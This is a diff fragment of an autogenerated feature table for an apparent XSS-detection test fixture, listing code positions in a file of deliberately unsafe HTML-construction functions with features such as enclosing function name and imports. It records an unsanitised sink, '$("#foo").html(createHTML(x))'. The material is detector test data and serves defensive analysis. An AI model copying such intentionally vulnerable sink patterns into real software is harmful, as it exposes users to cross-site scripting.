anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | exceptional return of anonymous function | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | exceptional return of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | functio ... (x));\\n} | assignedToPropName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | functio ... (x));\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | functio ... (x));\\n} | contextSurroundingFunctionParameters | (x) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | functio ... (x));\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | return of anonymous function | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | return of anonymous function | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:43:93:43 | x | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:43:93:43 | x | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:43:93:43 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:43:93:43 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:43:93:43 | x | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:43:93:43 | x | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:43:93:43 | x | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:43:93:43 | x | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:43:93:43 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:43:93:43 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:5 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:5 | $ | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:5 | $ | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:5 | $ | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:5 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:13 | $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:13 | $("#foo") | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:13 | $("#foo") | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:13 | $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:13 | $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:13 | exceptional return of $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:13 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:13 | exceptional return of $("#foo") | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:13 | exceptional return of $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:13 | exceptional return of $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:18 | $("#foo").html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:18 | $("#foo").html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:18 | $("#foo").html | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:18 | $("#foo").html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:18 | $("#foo").html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:33 | $("#foo ... TML(x)) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:33 | $("#foo ... TML(x)) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:33 | $("#foo ... TML(x)) | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:33 | $("#foo ... TML(x)) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:33 | $("#foo ... TML(x)) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:33 | exceptional return of $("#foo ... TML(x)) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:33 | exceptional return of $("#foo ... TML(x)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:33 | exceptional return of $("#foo ... TML(x)) | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:33 | exceptional return of $("#foo ... TML(x)) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:5:94:33 | exceptional return of $("#foo ... TML(x)) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:7:94:12 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:7:94:12 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:7:94:12 | "#foo" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23383,6 +153423,16 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:7:94:12 | "#foo" | enclosingFunctionBody | x $ #foo html createHTML x | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:7:94:12 | "#foo" | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:7:94:12 | "#foo" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:15:94:18 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:15:94:18 | html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:15:94:18 | html | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:15:94:18 | html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:15:94:18 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:29 | createHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:29 | createHTML | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:29 | createHTML | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:29 | createHTML | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:29 | createHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | createHTML(x) | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | createHTML(x) | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | createHTML(x) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23390,16 +153440,125 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | createHTML(x) | enclosingFunctionBody | x $ #foo html createHTML x | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | createHTML(x) | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | createHTML(x) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | exceptional return of createHTML(x) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | exceptional return of createHTML(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | exceptional return of createHTML(x) | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | exceptional return of createHTML(x) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:20:94:32 | exceptional return of createHTML(x) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:31:94:31 | x | CalleeFlexibleAccessPath | createHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:31:94:31 | x | InputArgumentIndex | 0 | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:31:94:31 | x | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:31:94:31 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:31:94:31 | x | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:31:94:31 | x | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:94:31:94:31 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:7:97:15 | myMermaid | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:7:97:15 | myMermaid | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:7:97:15 | myMermaid | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:7:97:15 | myMermaid | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:7:97:36 | myMerma ... rmaid') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:7:97:36 | myMerma ... rmaid') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:7:97:36 | myMerma ... rmaid') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:7:97:36 | myMermaid | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:7:97:36 | myMermaid | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:7:97:36 | myMermaid | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:19:97:25 | require | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:19:97:25 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:19:97:25 | require | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:19:97:36 | exceptional return of require('mermaid') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:19:97:36 | exceptional return of require('mermaid') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:19:97:36 | exceptional return of require('mermaid') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:19:97:36 | require('mermaid') | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:19:97:36 | require('mermaid') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:19:97:36 | require('mermaid') | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:27:97:35 | 'mermaid' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:27:97:35 | 'mermaid' | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:27:97:35 | 'mermaid' | calleeImports | | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:27:97:35 | 'mermaid' | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:27:97:35 | 'mermaid' | contextSurroundingFunctionParameters | | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:97:27:97:35 | 'mermaid' | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:98:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:98:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:98:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:98:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:98:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:98:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:98:29 | module. ... ateHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:98:29 | module. ... ateHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:98:29 | module. ... ateHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:114:1 | module. ... });\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:114:1 | module. ... });\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:1:114:1 | module. ... });\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:8:98:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:98:8:98:14 | exports | contextSurroundingFunctionParameters | | +| 